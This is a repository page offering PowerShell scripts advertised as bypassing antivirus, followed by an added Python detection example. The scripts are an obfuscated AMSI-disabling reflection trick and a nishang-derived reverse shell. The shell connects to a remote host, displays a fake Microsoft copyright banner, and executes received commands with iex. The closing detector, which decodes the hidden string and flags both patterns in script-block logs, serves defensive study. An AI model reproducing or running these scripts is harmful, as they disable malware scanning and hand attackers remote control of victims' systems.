Powershell scripts with 100% AV bypass

superior_hosting_service

A list of useful Powershell scripts with 100% AV bypass (At the time of publication).


PSSW100AVB

This is the Powershell Scripts with 100% AV Bypass Repository (PSSW100AVB).

Script

#Twitter: @TihanyiNorbert  (No AV detection 2021 October)
#Based on the original work of  Matt Graeber @mattifestation 'amsiInitFailed' script.
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)

#Twitter: @TihanyiNorbert  (No AV detection 2021 October)
#Based on the original nishang Framework written by @nikhil_mitt.
$c = New-Object System.Net.Sockets.TCPClient($args[0],$args[1]);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.`n`n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r  = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()
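
From the detection side, both scripts keep recognizable structure even though no signature string appears in clear text. The following is an added example, not code from this repository: it assumes script text is available as recorded by PowerShell Script Block Logging (event ID 4104), undoes the digit-pair-plus-offset string hiding used in the first script before matching, and flags the structural traits of both scripts. The finding labels and the literal-concatenation heuristic are assumptions of this example.

```python
import re

# Constructed input: the first script on this page, as it would appear in a
# PowerShell Script Block Logging record (event ID 4104).
SAMPLE_BLOCK = r'''
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
'''

DIGITS = re.compile(r'"(\d{20,})"')                                  # long all-digit literals
OFFSET = re.compile(r"\[char\]\s*\[int\]\s*\(\s*(\d+)\s*\+", re.I)   # [char][int](N + ...
WIDTH = re.compile(r"substring\([^,]*,\s*([1-9]\d*)\s*\)", re.I)     # .substring(x, W)


def decode_numeric_strings(block):
    """Undo 'fixed-width decimal chunk + constant offset' string hiding.

    Heuristic (assumption): digit literals are concatenated in order of appearance.
    """
    digits = "".join(DIGITS.findall(block))
    offset, width = OFFSET.search(block), WIDTH.search(block)
    if not (digits and offset and width):
        return ""
    n, w = int(offset.group(1)), int(width.group(1))
    codes = (int(digits[i:i + w]) + n for i in range(0, len(digits) - w + 1, w))
    return "".join(chr(c) if 32 <= c < 127 else "?" for c in codes)


def assess(block):
    """Return finding labels (names chosen for this example) for one script block."""
    flat = re.sub(r"[\s`]+", "", block).lower()   # drop whitespace and backtick escapes
    findings = []
    if all(t in flat for t in (".gettype(", ".getfield(", "nonpublic,static",
                               ".setvalue($null,$true)")):
        findings.append("reflection-write-to-nonpublic-static-field")
    if "amsi" in decode_numeric_strings(block).lower():
        findings.append("amsi-name-hidden-in-numeric-encoding")
    if (all(t in flat for t in ("net.sockets.tcpclient", ".getstream()", ".read("))
            and re.search(r"\b(iex|invoke-expression)\b", block, re.I)):
        findings.append("tcp-stream-input-passed-to-invoke-expression")
    return findings


if __name__ == "__main__":
    print(assess(SAMPLE_BLOCK))
```

Decoding before matching is the point: a plain keyword search for the field name named in the script's comment finds nothing in the logged text, while the decoded form contains it.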